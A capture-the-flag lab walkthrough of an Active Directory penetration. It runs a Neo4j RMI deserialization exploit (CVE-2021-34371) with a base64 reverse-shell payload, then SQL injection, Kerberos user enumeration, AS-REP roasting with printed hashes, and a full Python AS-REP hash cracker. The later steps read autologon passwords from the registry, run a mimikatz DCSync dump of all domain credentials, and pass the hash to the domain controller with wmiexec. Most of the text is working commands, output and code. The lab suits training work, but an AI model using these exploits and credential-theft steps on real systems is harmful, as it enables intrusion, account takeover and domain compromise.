Time

Target introduction:

Time is a medium-difficulty lab environment. Completing it helps players learn the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, deepens understanding of the core authentication mechanism of a domain environment, and covers some interesting technical points of domain penetration. The lab has 4 flags, spread across different hosts.

First, a full-port scan of the external host with fscan:

.\fscan64.exe -h 39.98.236.66 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.236.66    is alive
[*] Icmp alive hosts len is: 1
39.98.236.66:22 open
39.98.236.66:1337 open
39.98.236.66:7473 open
39.98.236.66:7474 open
39.98.236.66:7687 open
39.98.236.66:36731 open
[*] alive ports len is: 6
start vulscan
已完成 0/6 [-] ssh 39.98.236.66:22 root 123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
已完成 0/6 [-] webtitle https://39.98.236.66:1337 Get "https://39.98.236.66:1337": EOF
[*] WebTitle: https://39.98.236.66:7687 code:400 len:50     title:None
[*] WebTitle: http://39.98.236.66:7474  code:303 len:0      title:None 跳转url: http://39.98.236.66:7474/browser/
[*] WebTitle: https://39.98.236.66:7473 code:303 len:0      title:None 跳转url: https://39.98.236.66:7473/browser/
[*] WebTitle: http://39.98.236.66:7474/browser/ code:200 len:3279   title:Neo4j Browser
[*] WebTitle: https://39.98.236.66:7473/browser/ code:200 len:3279   title:Neo4j Browser
已完成 6/6
[*] 扫描结束,耗时: 4m28.3387393s

There is a Neo4j instance. The web UI reports Neo4j Browser version: 4.0.6, but that is the version of the browser front end, not of the database server. The interesting port is 1337, the neo4j-shell RMI service (which is also why fscan's HTTP probe of it only got EOF). Searching turns up CVE-2021-34371: Neo4j through 3.4.18 with the shell server enabled exposes an RMI interface that deserializes arbitrary Java objects, and a Rhino gadget chain on the classpath turns that into remote code execution.

https://github.com/zwjjustdoit/CVE-2021-34371.jar

java -jar rhino_gadget.jar rmi://39.98.236.25:1337 "bash -c {echo,xxx}|{base64,-d}|{bash,-i}"

Here xxx stands for the base64-encoded reverse-shell command; the {echo,xxx} brace-expansion form keeps spaces out of the argument.

Once the shell comes back, the first flag is on this host.

Set up a proxy into the internal network and run fscan again through it; results:

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.0
start infoscan
已完成 0/0 listen ip4:icmp 0.0.0.0: socket: operation not permitted
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.25     is alive
(icmp) Target 172.22.6.36     is alive
(icmp) Target 172.22.6.38     is alive
[*] Icmp alive hosts len is: 4
172.22.6.25:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.12:135 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.36:7687 open
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.12:88 open
[*] alive ports len is: 11
start vulscan
[+] NetInfo:
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] 172.22.6.12  (Windows Server 2016 Datacenter 14393)
[*] 172.22.6.25          XIAORANG\WIN2019           
[+] NetInfo:
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] 172.22.6.12    [+]DC XIAORANG\DC-PROGAME        Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.6.38        code:200 len:1531   title:后台登录
[*] WebTitle:https://172.22.6.36:7687  code:400 len:50     title:None
已完成 11/11
[*] 扫描结束,耗时: 15.839546699s

Of the internal hosts, only the admin login page on 172.22.6.38 looks attackable. It has SQL injection; use it to pull account names and passwords (details omitted, sqlmap handles it).

The second flag turns up along the way.

The user table, together with the hint from the first flag, points at brute-forcing Kerberos: take the names from the table and check which ones are valid domain accounts against the DC. Kerberos pre-authentication leaks this without a password, because the KDC answers a bare AS-REQ for an unknown principal with KDC_ERR_C_PRINCIPAL_UNKNOWN and for a known one with KDC_ERR_PREAUTH_REQUIRED (or an AS-REP).

Tool: ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing (github.com)

Command: ./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab user_name.txt -t 10

Result:


    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/09/23 - Ronnie Flathers @ropnop

2023/04/09 16:02:01 >  Using KDC(s):
2023/04/09 16:02:01 >   172.22.6.12:88

2023/04/09 16:02:01 >  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       gaiyong@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       wengbang@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       shuzhen@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       xiqidi@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       yuanchang@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       xuanjiang@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       lvhui@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       wenbo@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       zhenjun@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       jinqing@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       yangju@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       weicheng@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       haobei@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       jizhen@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       jingze@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       zhaoxiu@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       liangliang@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       tangshun@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       rubao@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       xiyi@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       chebin@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       jicheng@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       chouqian@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       qiyue@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       beijin@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       chenghui@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       yanglang@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       pengyuan@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       jihuan@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       fusong@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       gaijin@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       duanmuxiao@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       dongcheng@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       tangrong@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       zhufeng@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       luwan@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       hongzhi@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       lianhuangchen@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       lili@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       rangsibo@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       yifu@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       wohua@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       haoguang@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       huabi@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       wenshao@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       langying@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       diaocai@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       lianggui@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       manxue@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       baqin@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       wenbiao@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       maqun@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       chengqiu@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       louyou@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       weishengshan@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       chuyuan@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       wenliang@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       yulvxue@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       pangzhen@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       luyue@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       ganjian@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       lezhong@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       guohong@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       hongqun@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       sheweiyue@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       lidongjin@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       yexing@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       dujian@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       maoda@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       qiaomei@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       zhangxin@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       ganjian@xiaorang.lab

Extract the valid usernames from the output (weixian and ganjian appear twice because the input list had duplicates):

weixian@xiaorang.lab
gaiyong@xiaorang.lab
wengbang@xiaorang.lab
shuzhen@xiaorang.lab
xiqidi@xiaorang.lab
yuanchang@xiaorang.lab
xuanjiang@xiaorang.lab
lvhui@xiaorang.lab
wenbo@xiaorang.lab
zhenjun@xiaorang.lab
jinqing@xiaorang.lab
yangju@xiaorang.lab
weicheng@xiaorang.lab
haobei@xiaorang.lab
jizhen@xiaorang.lab
jingze@xiaorang.lab
zhaoxiu@xiaorang.lab
liangliang@xiaorang.lab
tangshun@xiaorang.lab
rubao@xiaorang.lab
xiyi@xiaorang.lab
chebin@xiaorang.lab
jicheng@xiaorang.lab
chouqian@xiaorang.lab
qiyue@xiaorang.lab
beijin@xiaorang.lab
chenghui@xiaorang.lab
yanglang@xiaorang.lab
pengyuan@xiaorang.lab
jihuan@xiaorang.lab
fusong@xiaorang.lab
gaijin@xiaorang.lab
duanmuxiao@xiaorang.lab
dongcheng@xiaorang.lab
tangrong@xiaorang.lab
zhufeng@xiaorang.lab
luwan@xiaorang.lab
hongzhi@xiaorang.lab
lianhuangchen@xiaorang.lab
lili@xiaorang.lab
rangsibo@xiaorang.lab
yifu@xiaorang.lab
wohua@xiaorang.lab
haoguang@xiaorang.lab
huabi@xiaorang.lab
wenshao@xiaorang.lab
langying@xiaorang.lab
diaocai@xiaorang.lab
lianggui@xiaorang.lab
manxue@xiaorang.lab
baqin@xiaorang.lab
wenbiao@xiaorang.lab
maqun@xiaorang.lab
chengqiu@xiaorang.lab
louyou@xiaorang.lab
weishengshan@xiaorang.lab
chuyuan@xiaorang.lab
wenliang@xiaorang.lab
yulvxue@xiaorang.lab
pangzhen@xiaorang.lab
luyue@xiaorang.lab
ganjian@xiaorang.lab
lezhong@xiaorang.lab
guohong@xiaorang.lab
hongqun@xiaorang.lab
sheweiyue@xiaorang.lab
lidongjin@xiaorang.lab
yexing@xiaorang.lab
dujian@xiaorang.lab
maoda@xiaorang.lab
qiaomei@xiaorang.lab
zhangxin@xiaorang.lab
ganjian@xiaorang.lab
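Pulling the names out of the kerbrute log by hand is error-prone, and the duplicates above show why. The helper below is an added example, not part of the original writeup: it collects the VALID USERNAME lines into a deduplicated list ready for a GetNPUsers.py users file. The sample log is constructed in the shape of the output above; dropping the @xiaorang.lab suffix is a choice made here so that the principal in the resulting AS-REP hash reads user@REALM rather than user@domain@REALM.

```python
"""Added example: kerbrute userenum output -> deduplicated user list. Sample log is constructed."""
import re

VALID_RE = re.compile(r"\[\+\] VALID USERNAME:\s+(\S+)")


def extract_valid_users(kerbrute_output: str, strip_domain: bool = True):
    """Return the valid usernames in first-seen order without duplicates.
    With strip_domain=True the '@domain' part is removed, so the file can be fed
    to GetNPUsers.py -usersfile without doubling the realm in the hash principal."""
    users = []
    for match in VALID_RE.finditer(kerbrute_output):
        name = match.group(1)
        if strip_domain:
            name = name.split("@", 1)[0]
        if name not in users:          # kerbrute echoes duplicates from the input list
            users.append(name)
    return users


# Constructed sample in the shape of the kerbrute log above (one name on purpose twice).
SAMPLE_OUTPUT = """\
2023/04/09 16:02:01 >  Using KDC(s):
2023/04/09 16:02:01 >   172.22.6.12:88

2023/04/09 16:02:01 >  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       gaiyong@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       weixian@xiaorang.lab
2023/04/09 16:02:01 >  [+] VALID USERNAME:       zhangxin@xiaorang.lab
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OUTPUT
    print("\n".join(extract_valid_users(text)))
```

Run it with the saved kerbrute output as the first argument and redirect stdout to users.txt.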

Then run Impacket's GetNPUsers.py over the list (the list as -usersfile, output in hashcat format). It requests an AS-REP for every name without sending pre-authentication data. The accounts it is after are not "users without an NTLM password" but accounts with "Do not require Kerberos preauthentication" set: for those the KDC hands back an AS-REP whose encrypted part is keyed with the user's password hash, which can then be cracked offline (AS-REP roasting). Two accounts are affected. The principal shows the domain twice because the list was fed as user@xiaorang.lab; this is harmless, since for etype 23 the username is not part of the key derivation.

$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:bd28d123b9d8f6e8f9cf426ca2daedf9$5f87bc7ec503e4b65e7c72f326449bf45f6b677c08445617a7616dc49a07151b2f4466beda6f54af8826d1f12a787ae9664111e43b2f90183cb518218a4f3339948823637d34f7c9f999e0105f46adc51cc59a50513802ef814bc7aa81087c97ffc1ff6d14a9b989a43bac16ec1a01e8466e9a83cb77014d97f86fc8ccf31d688aaed4b4fd5747c15519ef80bbfabbf42a94908d305d139b2c5f535391cf72b928fbc94aa9003d5c60480074497cb5c34874a1a32cb5b9cca201be8cac2a54e09426deff0126de8941698ea3a153a8a8bfea8aa7f6c718c814db167ec95d5b3878d78afc16095ff450569920
$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:4e26f7a6d2668e775ccad0a50ea9f757$f8d8f9e1e229619f4471a561147ad688a6b6f2193ab54f1ddefe1c58cb45e40222aeb681d58d234805418d9093cde036538fe61f39ce059d3ee0c188c9cb586b8201935aea0ae3b41f27f7718dce461b958f686f712275bf7dec79f576cbe020b724fcc04d754ec2609321a89fe968742485991b46b4d46e03c23249230c773616a6437d827575abde7ef68e7483987b7de1afb9bc57e0eab0a14ecefc478d7169105a62bbd767f48d0aeb6e4427416bad83cac847b9d826dbb12201aa5e6c8642c966300fb01cc27d605487a908c1002cdee0b1962a39e82ab32c60fc421573b26d3546e76ca94dcbec7a8a

Crack them with hashcat, mode 18200 (Kerberos 5 AS-REP etype 23); xxx stands for the hash line, or a file holding both lines:

hashcat -m 18200 --force -a 0 'xxx' rockyou.txt
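What hashcat -m 18200 actually does with those lines, written out as an added example that is not from the writeup: for etype 23 the AS-REP encrypted part is RC4-HMAC (RFC 4757) keyed with the NT hash of the user's password. Each candidate is turned into an NT hash, the HMAC-MD5 subkeys are derived with key usage 8 (the value Windows uses for the AS-REP enc-part), the blob is RC4-decrypted and the checksum compared. The sample hash is constructed here from a known password; the principal, confounder and plaintext are placeholders, and MD4 is implemented in pure Python because hashlib's md4 is often disabled under OpenSSL 3.

```python
"""Added example: offline AS-REP roast cracking for $krb5asrep$23$ lines (constructed sample)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
AS_REP_ENC_PART_USAGE = 8   # RC4-HMAC key usage for the AS-REP enc-part (RFC 4757)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (three rounds over 16-word blocks, little-endian)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (   # (boolean function, message-word order, shifts, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, order, shifts, const in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4                     # target word cycles a, d, c, b
                f = fn(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4])
                v[t] = _rotl((v[t] + f + X[k] + const) & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password; this is the etype-23 key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage); checksum = HMAC(K1, conf|data); K3 = HMAC(K1, checksum)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_decrypt(key: bytes, usage: int, blob: bytes):
    """Return the plaintext if the checksum verifies under this key, else None."""
    checksum, edata = blob[:16], blob[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), edata)
    return data[8:] if hmac.compare_digest(_hmac_md5(k1, data), checksum) else None


def parse_asrep_hash(line: str):
    """'$krb5asrep$23$principal:checksum_hex$edata_hex' -> (principal, checksum, edata)."""
    if not line.startswith("$krb5asrep$23$"):
        raise ValueError("not an etype-23 AS-REP hash")
    principal, rest = line[len("$krb5asrep$23$"):].split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack_asrep(line: str, wordlist):
    """Dictionary attack; the principal never enters the key derivation for etype 23."""
    _, checksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), AS_REP_ENC_PART_USAGE, checksum + edata) is not None:
            return candidate
    return None


def make_sample_hash(principal: str, password: str) -> str:
    """Constructed sample: placeholder plaintext and fixed confounder, encrypted as a KDC would."""
    placeholder_enc_part = b"EncASRepPart placeholder (constructed)"
    blob = rc4_hmac_encrypt(nt_hash(password), AS_REP_ENC_PART_USAGE, placeholder_enc_part, b"\x00" * 8)
    return f"$krb5asrep$23${principal}:{blob[:16].hex()}${blob[16:].hex()}"


SAMPLE_HASH = make_sample_hash("zhangxin@XIAORANG.LAB", "strawberry")   # constructed, not the real one

if __name__ == "__main__":
    print(crack_asrep(SAMPLE_HASH, ["123456", "hellokitty", "strawberry"]))
```

The real hashes from GetNPUsers.py go through exactly the same steps; hashcat just does them on the GPU. It also shows why the doubled realm in the principal is irrelevant: nothing before the colon is used, only the checksum and the encrypted data.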

Cracking recovers the passwords:

zhangxin/strawberry

wenshao/hellokitty

That gives two domain user accounts.

Log on to 172.22.6.25 (WIN2019) with one of them and collect data for BloodHound:

SharpHound.exe -c all

BloodHound shows that the path onward from WIN2019 goes through the user yuxuan, and the only lead is a HasSession edge: yuxuan has a session on this box, which suggests the machine logs that account on automatically at boot. Windows stores autologon settings in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (AutoAdminLogon, DefaultUserName and DefaultPassword; see 让 Windows 10 开机自动登录 | 骑士の物语 (yihuishou.github.io)). Reading DefaultPassword there gives the credentials. Note that when autologon is configured with the Sysinternals Autologon tool the password is instead kept in the DefaultPassword LSA secret, which needs SYSTEM to read; here it was in the plain registry value:

yuxuan/Yuxuan7QbrgZ3L

After logging on as yuxuan: BloodHound had already shown that the account's sIDHistory carries a privileged SID, so it inherits that group's rights, including the directory replication rights DCSync needs. Dump the credentials straight from the DC:

.\mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit" > 11.txt

(/all dumps every account in one go; /csv keeps the output to one line per account. To pull a single account instead, use /user:Administrator.)

That yields the Administrator NTLM hash. Pass-the-hash with CrackMapExec picks up the third flag.

Finally, wmiexec.py against the DC for the last flag. The LM half of -hashes is 32 zeros because no LM hash is stored; -codec gbk decodes the Chinese-locale console output:

proxychains4 wmiexec.py -hashes 00000000000000000000000000000000:04d93ffd6f5f6e4490e0de23f240a5e9 Administrator@172.22.6.12 -codec gbk